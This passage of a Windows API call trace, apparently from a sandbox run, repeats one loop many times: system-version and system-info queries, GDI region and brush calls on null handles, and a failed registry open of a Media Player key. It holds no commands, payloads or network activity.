lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.639] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.639] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.639] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.639] BeginPath (hdc=0x0) returned 0 [0017.639] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.639] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.640] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.640] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.640] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f04027d [0017.640] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x99040713 [0017.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b83 [0017.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b84 [0017.640] CombineRgn (hrgnDst=0x1040b83, hrgnSrc1=0x8f04027d, hrgnSrc2=0x99040713, iMode=1) returned 1 [0017.640] CombineRgn (hrgnDst=0x1040b84, hrgnSrc1=0x8f04027d, hrgnSrc2=0x99040713, iMode=4) returned 2 [0017.640] CreateSolidBrush (color=0xff) returned 0x2100b82 [0017.640] CreateSolidBrush (color=0xff0000) returned 0x1100b85 [0017.640] DeleteObject (ho=0x1100b85) returned 1 [0017.640] DeleteObject (ho=0x99040713) returned 1 [0017.640] DeleteObject (ho=0x8f04027d) returned 1 [0017.640] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.640] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.641] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.641] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.641] BeginPath (hdc=0x0) returned 0 [0017.641] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.641] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.641] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.641] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.641] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a040713 [0017.641] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9004027d [0017.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b86 [0017.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b87 [0017.641] CombineRgn (hrgnDst=0x1040b86, hrgnSrc1=0x9a040713, hrgnSrc2=0x9004027d, iMode=1) returned 1 [0017.641] CombineRgn (hrgnDst=0x1040b87, hrgnSrc1=0x9a040713, hrgnSrc2=0x9004027d, iMode=4) returned 2 [0017.641] CreateSolidBrush (color=0xff) returned 0x2100b85 [0017.641] CreateSolidBrush (color=0xff0000) returned 0x1100b88 [0017.641] DeleteObject (ho=0x1100b88) returned 1 [0017.641] DeleteObject (ho=0x9004027d) returned 1 [0017.641] DeleteObject (ho=0x9a040713) returned 1 [0017.641] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.641] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.641] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.642] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.642] BeginPath (hdc=0x0) returned 0 [0017.642] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.642] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.642] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.642] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.642] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9104027d [0017.642] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b040713 [0017.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b89 [0017.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8a [0017.642] CombineRgn (hrgnDst=0x1040b89, hrgnSrc1=0x9104027d, hrgnSrc2=0x9b040713, iMode=1) returned 1 [0017.642] CombineRgn (hrgnDst=0x1040b8a, hrgnSrc1=0x9104027d, hrgnSrc2=0x9b040713, iMode=4) returned 2 [0017.642] CreateSolidBrush (color=0xff) returned 0x2100b88 [0017.642] CreateSolidBrush (color=0xff0000) returned 0x1100b8b [0017.642] DeleteObject (ho=0x1100b8b) returned 1 [0017.642] DeleteObject (ho=0x9b040713) returned 1 [0017.642] DeleteObject (ho=0x9104027d) returned 1 [0017.642] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.642] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.642] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.642] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.642] BeginPath (hdc=0x0) returned 0 [0017.642] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.642] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.642] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.643] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.643] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.643] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c040713 [0017.643] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9204027d [0017.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8c [0017.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8d [0017.643] CombineRgn (hrgnDst=0x1040b8c, hrgnSrc1=0x9c040713, hrgnSrc2=0x9204027d, iMode=1) returned 1 [0017.643] CombineRgn (hrgnDst=0x1040b8d, hrgnSrc1=0x9c040713, hrgnSrc2=0x9204027d, iMode=4) returned 2 [0017.643] CreateSolidBrush (color=0xff) returned 0x2100b8b [0017.643] CreateSolidBrush (color=0xff0000) returned 0x1100b8e [0017.643] DeleteObject (ho=0x1100b8e) returned 1 [0017.643] DeleteObject (ho=0x9204027d) returned 1 [0017.643] DeleteObject (ho=0x9c040713) returned 1 [0017.643] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.643] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.643] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.643] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.643] BeginPath (hdc=0x0) returned 0 [0017.643] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.643] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.643] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.643] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.643] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.644] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9304027d [0017.644] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d040713 [0017.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8f [0017.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b90 [0017.644] CombineRgn (hrgnDst=0x1040b8f, hrgnSrc1=0x9304027d, hrgnSrc2=0x9d040713, iMode=1) returned 1 [0017.644] CombineRgn (hrgnDst=0x1040b90, hrgnSrc1=0x9304027d, hrgnSrc2=0x9d040713, iMode=4) returned 2 [0017.644] CreateSolidBrush (color=0xff) returned 0x2100b8e [0017.644] CreateSolidBrush (color=0xff0000) returned 0x1100b91 [0017.644] DeleteObject (ho=0x1100b91) returned 1 [0017.644] DeleteObject (ho=0x9d040713) returned 1 [0017.644] DeleteObject (ho=0x9304027d) returned 1 [0017.644] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.644] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.644] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.644] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.644] BeginPath (hdc=0x0) returned 0 [0017.644] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.644] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.644] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.644] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.645] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e040713 [0017.645] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9404027d [0017.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b92 [0017.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b93 [0017.645] CombineRgn (hrgnDst=0x1040b92, hrgnSrc1=0x9e040713, hrgnSrc2=0x9404027d, iMode=1) returned 1 [0017.645] CombineRgn (hrgnDst=0x1040b93, hrgnSrc1=0x9e040713, hrgnSrc2=0x9404027d, iMode=4) returned 2 [0017.645] CreateSolidBrush (color=0xff) returned 0x2100b91 [0017.645] CreateSolidBrush (color=0xff0000) returned 0x1100b94 [0017.645] DeleteObject (ho=0x1100b94) returned 1 [0017.645] DeleteObject (ho=0x9404027d) returned 1 [0017.645] DeleteObject (ho=0x9e040713) returned 1 [0017.645] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.645] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.645] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.645] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.645] BeginPath (hdc=0x0) returned 0 [0017.645] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.645] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.645] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.645] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.645] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9504027d [0017.645] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f040713 [0017.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b95 [0017.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b96 [0017.646] CombineRgn (hrgnDst=0x1040b95, hrgnSrc1=0x9504027d, hrgnSrc2=0x9f040713, iMode=1) returned 1 [0017.646] CombineRgn (hrgnDst=0x1040b96, hrgnSrc1=0x9504027d, hrgnSrc2=0x9f040713, iMode=4) returned 2 [0017.646] CreateSolidBrush (color=0xff) returned 0x2100b94 [0017.646] CreateSolidBrush (color=0xff0000) returned 0x1100b97 [0017.646] DeleteObject (ho=0x1100b97) returned 1 [0017.646] DeleteObject (ho=0x9f040713) returned 1 [0017.646] DeleteObject (ho=0x9504027d) returned 1 [0017.646] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.646] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.646] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.646] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.646] BeginPath (hdc=0x0) returned 0 [0017.646] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.646] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.646] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.646] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.646] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.646] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0040713 [0017.646] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9604027d [0017.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b98 [0017.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b99 [0017.646] CombineRgn (hrgnDst=0x1040b98, hrgnSrc1=0xa0040713, hrgnSrc2=0x9604027d, iMode=1) returned 1 [0017.646] CombineRgn (hrgnDst=0x1040b99, hrgnSrc1=0xa0040713, hrgnSrc2=0x9604027d, iMode=4) returned 2 [0017.646] CreateSolidBrush (color=0xff) returned 0x2100b97 [0017.646] CreateSolidBrush (color=0xff0000) returned 0x1100b9a [0017.646] DeleteObject (ho=0x1100b9a) returned 1 [0017.646] DeleteObject (ho=0x9604027d) returned 1 [0017.646] DeleteObject (ho=0xa0040713) returned 1 [0017.647] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.647] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.647] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.647] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.647] BeginPath (hdc=0x0) returned 0 [0017.647] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.647] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.647] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.647] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.647] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9704027d [0017.647] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa1040713 [0017.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9b [0017.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9c [0017.647] CombineRgn (hrgnDst=0x1040b9b, hrgnSrc1=0x9704027d, hrgnSrc2=0xa1040713, iMode=1) returned 1 [0017.647] CombineRgn (hrgnDst=0x1040b9c, hrgnSrc1=0x9704027d, hrgnSrc2=0xa1040713, iMode=4) returned 2 [0017.647] CreateSolidBrush (color=0xff) returned 0x2100b9a [0017.647] CreateSolidBrush (color=0xff0000) returned 0x1100b9d [0017.647] DeleteObject (ho=0x1100b9d) returned 1 [0017.647] DeleteObject (ho=0xa1040713) returned 1 [0017.647] DeleteObject (ho=0x9704027d) returned 1 [0017.647] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.647] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.647] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.648] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.648] BeginPath (hdc=0x0) returned 0 [0017.648] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.648] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 